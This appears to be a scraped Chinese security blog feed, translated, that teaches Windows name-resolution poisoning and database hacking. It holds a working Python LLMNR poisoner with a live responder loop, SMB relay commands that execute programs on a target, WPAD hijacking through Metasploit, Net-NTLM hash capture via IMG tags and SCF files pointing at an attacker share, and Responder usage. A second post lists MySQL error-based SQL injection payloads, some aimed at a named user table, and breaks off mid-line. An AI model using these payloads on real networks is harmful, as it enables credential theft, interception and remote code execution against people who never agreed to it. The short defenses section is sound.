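<p>The header fields listed above and the poisoned answer the demo builds, as an added example that is not part of the original post and is separate from the Python 2 demo above: a Python 3 encoder/decoder for LLMNR queries and responses that constructs the spoofed reply offline, plus a minimal responder loop. Standard library only; the function names are this example's own, and the name <code>WEBTST01</code> and address <code>11.22.33.44</code> are reused from the post as sample values.</p>

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QTYPE_AAAA, QCLASS_IN = 1, 28, 1
HEADER = struct.Struct("!HHHHHH")   # ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
RR_FIXED = struct.Struct("!HHIH")   # TYPE, CLASS, TTL, RDLENGTH (RDATA follows)


def encode_name(name):
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.encode("ascii").split(b"."):
        if not 0 < len(label) < 64:
            raise ValueError("bad label length")
        out += bytes([len(label)]) + label
    return out + b"\x00"


def decode_name(buf, off):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:
            raise ValueError("compression pointer not expected in LLMNR")
        labels.append(buf[off:off + n].decode("ascii"))
        off += n


def parse_header(buf):
    """Split the 12-byte header into the fields listed in the post (QR, OPCODE, C, TC, T, RCODE, counts)."""
    tid, flags, qd, an, ns, ar = HEADER.unpack_from(buf)
    return {"id": tid, "qr": flags >> 15 & 1, "opcode": flags >> 11 & 0xF,
            "c": flags >> 10 & 1, "tc": flags >> 9 & 1, "t": flags >> 8 & 1,
            "rcode": flags & 0xF, "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar}


def build_query(tid, name, qtype=QTYPE_A):
    """The datagram a Windows host multicasts to 224.0.0.252:5355 for `ping NAME`."""
    return HEADER.pack(tid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(buf):
    hdr = parse_header(buf)
    if hdr["qr"] != 0 or hdr["qdcount"] != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(buf, HEADER.size)
    qtype, qclass = struct.unpack_from("!HH", buf, off)
    return hdr, name, qtype, qclass


def build_poisoned_answer(query, attacker_ip, ttl=30):
    """Claim the queried name for attacker_ip: same ID, QR=1, the question echoed back,
    one A record. Returns None for anything but an A query."""
    hdr, name, qtype, qclass = parse_query(query)
    if qtype != QTYPE_A:
        return None
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    answer = encode_name(name) + RR_FIXED.pack(QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(attacker_ip)
    return HEADER.pack(hdr["id"], 0x8000, 1, 1, 0, 0) + question + answer


def parse_answer(buf):
    """Decode a response into (header, queried name, [(name, type, ttl, rdata), ...])."""
    hdr = parse_header(buf)
    name, off = decode_name(buf, HEADER.size)
    off += 4                                   # skip QTYPE/QCLASS of the echoed question
    answers = []
    for _ in range(hdr["ancount"]):
        rname, off = decode_name(buf, off)
        rtype, _rclass, ttl, rdlen = RR_FIXED.unpack_from(buf, off)
        off += RR_FIXED.size
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        answers.append((rname, rtype, ttl, rdata))
    return hdr, name, answers


def respond_forever(attacker_ip, iface_ip):
    """Join the LLMNR group on iface_ip and answer every A query with attacker_ip.
    Must run on the victim's link; replies are unicast back to the querier."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", LLMNR_PORT))
    s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
                 socket.inet_aton(LLMNR_GROUP) + socket.inet_aton(iface_ip))
    while True:
        data, src = s.recvfrom(1024)
        try:
            reply = build_poisoned_answer(data, attacker_ip)
        except ValueError:
            continue                           # not a query we understand, stay quiet
        if reply:
            s.sendto(reply, src)
```

<code>build_query(0x1234, "WEBTST01")</code> yields the datagram a Windows host multicasts; passing it to <code>build_poisoned_answer(..., "11.22.33.44")</code> gives the 50-byte unicast reply, which differs from a legitimate answer only in who sent it. <code>respond_forever("11.22.33.44", "&lt;interface IP&gt;")</code> is the live loop; the defence is simply to turn LLMNR off by group policy, since nothing in the protocol lets the querier tell the two answers apart.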
<h3 id="Network-Basic-Input-Output-System-NetBIOS"><a href="#Network-Basic-Input-Output-System-NetBIOS" class="headerlink" title="Network Basic Input/Output System (NetBIOS)"></a>Network Basic Input/Output System (NetBIOS)</h3><p>NetBIOS is an API providing various networking services.</p>
<p>NetBIOS provides three distinct services:</p>
<ul>
<li>Name service for name registration and resolution (ports: 137/udp and 137/tcp)</li>
<li>Datagram distribution service for connectionless communication (port: 138/udp)</li>
<li>Session service for connection-oriented communication (port: 139/tcp)</li>
</ul>
<h4 id="NBNS"><a href="#NBNS" class="headerlink" title="NBNS"></a>NBNS</h4><p>The NetBIOS Name Service resolves NetBIOS names to IP addresses. In most cases this is NetBIOS over TCP/IP (NBT), using UDP port 137.</p>
<p><img src="https://i.imgur.com/eA7fXEE.png" alt=""></p>
<p>When we ping a host name or call socket.gethostbyname('hostname'), the lookup order is: the local NetBIOS name cache, the LMHOSTS file, the WINS server, and finally a broadcast "Name Query" packet, which any host on the subnet can answer.</p>
<p><img src="https://i.imgur.com/rjQSub1.png" alt=""></p>
<h4 id="Nbtstat"><a href="#Nbtstat" class="headerlink" title="Nbtstat"></a>Nbtstat</h4><p>The local NetBIOS name cache can be inspected with the nbtstat command.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">NBTSTAT [ [-A IP address] [-c] [-n] [-R]]</div><div class="line">  -A  (Adapter status)  Lists the remote machine's name table given its IP address.</div><div class="line">  -c  (cache)           Lists the NBT cache of remote [machine] names and their IP addresses</div><div class="line">  -n  (names)           Lists local NetBIOS names.</div>
<div class="line">  -R  (Reload)          Purges and reloads the remote cache name table</div></pre></td></tr></table></figure>
<h4 id="SMBRelay"><a href="#SMBRelay" class="headerlink" title="SMBRelay"></a>SMBRelay</h4><p>SMB / SMB2<br>Server Message Block (SMB) is used mainly to share files, printers and serial ports between computers. SMB2 runs directly over TCP port 445; the older transport over the NetBIOS session service uses TCP port 139.</p>
<p>Authentication uses NTLMv2, a challenge-response exchange in three messages:</p>
<p><img src="https://i.imgur.com/fB6vgaV.png" alt=""></p>
<ol>
<li>Negotiate</li>
<li>Challenge</li>
<li>Authenticate</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Client (domain-joined machine) ----> Attacker (192.168.6.12) ----> Server (192.168.6.4)</div><div class="line">                                                                          |</div><div class="line">                                                                          |</div><div class="line">                                                                          v</div><div class="line">                                                                    DC (192.168.6.2)</div></pre></td></tr></table></figure>
<blockquote>
<p>Note<br>On Windows Server 2008 R2 the target must have "Digitally sign communications" disabled; otherwise smbrelayx.py fails with <strong>SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}…</strong>. Alternatively, the SMB session key can be obtained through NETLOGON (CVE-2015-0005).</p>
</blockquote>
<p>Registry value that disables signing on the target<br>HKLM\System\CurrentControlSet\Services\LanManServer\Parameters<br>RequireSecuritySignature REG_DWORD: 0 = Disabled</p>
<p>Tooling:<br>Impacket<br><a href="https://github.com/CoreSecurity/impacket" target="_blank" rel="external">https://github.com/CoreSecurity/impacket</a></p>
<p>The attacker relays the incoming SMB authentication to Server and executes calc.exe there:</p>
<p><code>python smbrelayx.py -h 192.168.6.4 -c "calc.exe"</code></p>
<p>The client, logged in with a valid account (usually a domain admin), is made to connect to the attacker, for example by running:</p>
<p><code>dir \\192.168.6.12\c$</code></p>
<p><img src="https://i.imgur.com/0s7ImOr.png" alt=""></p>
<h4 id="SMB签名"><a href="#SMB签名" class="headerlink" title="SMB签名"></a>SMB signing</h4><p>When the target requires signing, you need a valid machine account name and its NTLM hashes, and you point the -domain parameter at the DC.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">WIN-7JFKE9MFQQ7$:RUOS:00000000000000000000000000000000:FB55268036B7C0ACE6E417F2EF959C28</div></pre></td></tr></table></figure></p>
<p>Usage:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./smbrelayx.py -h 192.168.6.4 -c "calc.exe" -machine-account RUOS/WIN-7JFKE9MFQQ7\$ -machine-hashes LMHASH:NTHASH -domain DC</div></pre></td></tr></table></figure></p>
<p><img src="https://i.imgur.com/MQyVCej.png" alt=""></p>
<h4 id="BadTunnel"><a href="#BadTunnel" class="headerlink" title="BadTunnel"></a>BadTunnel</h4><p>Answering name queries across network segments</p>
<h3 id="WPAD"><a href="#WPAD" class="headerlink" title="WPAD"></a>WPAD</h3><p>WPAD (Web Proxy Auto-Discovery) lets the browser locate the PAC file through DHCP and DNS queries.</p>
<p>When "Automatically detect settings" is enabled under IE Internet Options > Connections, IE looks for the wpad.dat file in the following ways:</p>
<ul>
<li>DHCP (option 252)</li>
<li>DNS A record query</li>
<li>NetBios</li>
<li>LLMNR</li>
</ul>
<p>Creating a WPAD record in DNS (does not resolve?)</p>
<p><a href="https://technet.microsoft.com/en-us/library/cc995062.aspx" target="_blank" rel="external">https://technet.microsoft.com/en-us/library/cc995062.aspx</a></p>
<p><img src="https://i.imgur.com/FBblcZW.png" alt=""></p>
<p>Proxy auto-config<br>A proxy auto-config (PAC) file defines how an application automatically selects the appropriate proxy server for a given URL. It is conventionally named proxy.pac; the WPAD standard uses wpad.dat.</p>
<p>A simple example of a PAC file:<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="keyword">if</span> (url== <span class="string">'http://www.baidu.com/'</span>) <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line"> <span class="keyword">if</span> (host== <span class="string">'twitter.com'</span>) <span class="keyword">return</span> <span class="string">'SOCKS 127.0.0.10:7070'</span>;</div><div class="line"> <span class="keyword">if</span> (dnsResolve(host) == <span class="string">'10.0.0.100'</span>) <span class="keyword">return</span> <span class="string">'PROXY 127.0.0.1:8086;DIRECT'</span>;</div><div class="line"> <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line">}</div></pre></td></tr></table></figure></p>
<h4 id="如何攻击?"><a href="#如何攻击?" class="headerlink" title="如何攻击?"></a>How the attack works</h4><p>The client first resolves the WPAD name to an IP address, then downloads the wpad.dat file to configure the browser proxy.</p>
<p>WPAD server<br><a href="http://192.168.6.12/wpad.dat" target="_blank" rel="external">http://192.168.6.12/wpad.dat</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="comment">// URLs within this network are accessed directly</span></div><div class="line"> <span class="keyword">if</span> (isInNet(host, <span class="string">"127.0.0.1"</span>, <span class="string">"255.255.255.0"</span>))</div><div class="line"> {</div><div class="line"> <span class="keyword">return</span> <span class="string">"DIRECT"</span>;</div><div class="line"> }</div><div class="line"> <span class="comment">// HTTP proxy listening on 192.168.6.1:8080</span></div><div class="line"> <span class="keyword">return</span> <span class="string">"PROXY 192.168.6.1:8080; DIRECT"</span>;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>MSF NBNS response attack<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">msf > use auxiliary/spoof/nbns/nbns_response</div><div class="line">msf auxiliary(nbns_response) > set regex WPAD</div><div class="line">msf auxiliary(nbns_response) > set spoofip 192.168.6.12</div><div class="line">msf auxiliary(nbns_response) > run</div></pre></td></tr></table></figure></p>
<p>When IE visits a link it queries the WPAD name over NBNS, and the attacker machine answers with 192.168.6.12. IE then automatically downloads the wpad.dat file and caches the address under the registry key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]; from that point IE's traffic passes through our proxy server.</p>
<p><img src="https://i.imgur.com/Cah3y8L.png" alt=""></p>
<h4 id="抓取HASH"><a href="#抓取HASH" class="headerlink" title="抓取HASH"></a>Capturing hashes</h4><p>Net-NTLM hashes are used for network authentication; unlike NTLM hashes, they cannot be used for Pass-The-Hash attacks. The Net-NTLMv2 hash format is as follows.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin::RUOS:1122334455667788:d5006d468c997ca37845df3d88316477:0101000000000000eaca11bf5f6ed301ca362b9cc58cc07500000000020000000000000000000000</div></pre></td></tr></table></figure>
<p>Start the SMB service</p>
<p><img src="https://i.imgur.com/ZC6016i.png" alt=""></p>
<blockquote>
<p>Note<br>auxiliary/server/capture/http_ntlm: when accessed over HTTP it pops up the Windows security authentication dialog</p>
</blockquote>
<p>IMG tag<br><code><img src="\\192.168.6.12\1.jpg" /></code></p>
<p>Place test.scf in a shared directory<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[Shell]</div><div class="line">Command=2</div><div class="line">IconFile=\\192.168.6.12\test</div><div class="line">[Taskbar]</div><div class="line">Command=ToggleDesktop</div></pre></td></tr></table></figure></p>
<p>When a user opens a web page that embeds the IMG tag, or browses a shared directory containing test.scf, the machine automatically sends an authentication request to 192.168.6.12.</p>
<p><img src="https://i.imgur.com/rYznNPD.png" alt=""></p>
<h4 id="Crack-hash"><a href="#Crack-hash" class="headerlink" title="Crack hash"></a>Crack hash</h4><ul>
<li>Dictionary attack (not recommended)<br>hashcat64 -m 5600 -D 1 --show john_hashes_netntlmv2 example.dict</li>
<li>Rainbow tables</li>
</ul>
<h3 id="自动化攻击工具"><a href="#自动化攻击工具" class="headerlink" title="自动化攻击工具"></a>Automated attack tools</h3><ul>
<li><p>Inveigh<br>Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool<br><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank" rel="external">https://github.com/Kevin-Robertson/Inveigh</a></p>
</li>
<li><p>Responder<br>LLMNR/NBT-NS/mDNS Poisoner<br><a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="external">https://github.com/SpiderLabs/Responder</a></p>
</li>
<li><p>PS>Attack<br><a href="https://github.com/jaredhaight/PSAttack" target="_blank" rel="external">https://github.com/jaredhaight/PSAttack</a></p>
</li>
</ul>
<h4 id="Responder"><a href="#Responder" class="headerlink" title="Responder"></a>Responder</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./Responder.py -I eth0 -wrfvb -u 192.168.6.1:8888</div></pre></td></tr></table></figure>
<p>When Responder starts it brings up WPAD, SMB, web proxy and other services, and answers every name query with the Responder server's IP. A victim browsing the web through Responder's proxy gets HTML code injected into pages (the -b parameter) and is shown an authentication phishing prompt. When Serve-Exe = On is set, every exe the client downloads is replaced with the program named by ExeFilename.</p>
<p>Because Responder also answers queries for domain names, the output is far too noisy, so we modify NBTNS.py to ignore them.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># NBT_NS Server class.</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">NBTNS</span><span class="params">(BaseRequestHandler)</span>:</span></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">handle</span><span class="params">(self)</span>:</span></div><div class="line"> data, socket = self.request</div><div class="line"> Name = Decode_Name(data[<span class="number">13</span>:<span class="number">45</span>])</div><div class="line"> <span class="keyword">if</span> re.match(<span class="string">r'^([A-Z0-9]+(-[A-Z0-9]+)*\.)+[A-Z]{2,}$'</span>, Name):</div><div class="line"> <span class="comment">#print "this is a domain: " + Name</span></div><div class="line"> <span class="keyword">return</span> <span class="keyword">None</span></div></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/tpHTDCW.png" alt=""></p>
<h3 id="防范"><a href="#防范" class="headerlink" title="防范"></a>Defenses</h3><ul>
<li>Disable LLMNR<br>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f<br>reg add "HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f</li>
<li>Disable NetBIOS</li>
<li>Enable SMB signing</li>
</ul>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><ul>
<li><a href="https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt" target="_blank" rel="external">https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt</a></li>
<li><a href="https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python" target="_blank" rel="external">https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a></li>
<li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf" target="_blank" rel="external">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf</a></li>
<li><a href="http://www.ubiqx.org/cifs/SMB.html" target="_blank" rel="external">http://www.ubiqx.org/cifs/SMB.html</a></li>
</ul>
]]></content>
</entry>
<entry>
<title><![CDATA[Database Hacking]]></title>
<url>/2017/11/17/%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%91%E5%AE%A2/</url>
<content type="html"><![CDATA[<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>MySQL downloads for each version<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>Error-based injection</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="常用报错函数"></a>Commonly used error-raising functions</h4><p>FLOOR(X) rounds down to the nearest integer</p>
<p>select FLOOR(12.2) -> 12</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span 
class="keyword">by</span> x)a);</div></pre></td></tr></table></figure>
<p>XML document support</p>
<p>ExtractValue() (output limited to 32 characters)</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: '~root@localhost~'</p>
<p>UpdateXML()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure>
<p>[Err] 1105 - XPATH syntax error: '~root@localhost~'</p>
<a id="more"></a>
<p>geometrycollection()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> geometrycollection((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>multipoint()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>polygon()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>multipolygon()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>linestring()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> linestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>multilinestring()</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure>
<p>[Err] 1367 - Illegal non geometric '(select <code>b</code>.<code>user()</code> from (select 'root@localhost' AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)' value found during parsing</p>
<p>exp(), MySQL 5.5.5 and above</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</div></pre></td></tr></table></figure>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>Examples</h3><p>error-based<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">lang=en') AND EXTRACTVALUE(1267,CONCAT(0x5c,0x7170627871,(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">1267</span>=<span class="number">1267</span>) <span class="keyword">THEN</span> <span class="number">1</span> <span class="keyword">ELSE</span> <span class="number">0</span> <span class="keyword">END</span>)),<span class="number">0x7170707671</span>)) <span class="keyword">AND</span> (<span class="string">'PeJH'</span>=<span class="string">'PeJH</span></div><div class="line"><span class="string">name=b'</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, <span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">string</span> <span class="keyword">FROM</span> t <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))) <span class="keyword">and</span> a =<span class="string">'1</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, concat(0x7e,(SELECT string FROM t limit 1,1)) )</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, (SELECT string FROM t limit 1,1) )</span></div><div class="line"><span class="string">lang=en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">7</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'XTGg'</span>=<span class="string">'XTGg</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">200</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">where</span> username=<span class="string">'mihmd'</span> ))) <span class="keyword">and</span> (<span class="number">1</span>=<span class="string">'1;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x5c</span>,<span class="number">0x716b787871</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span 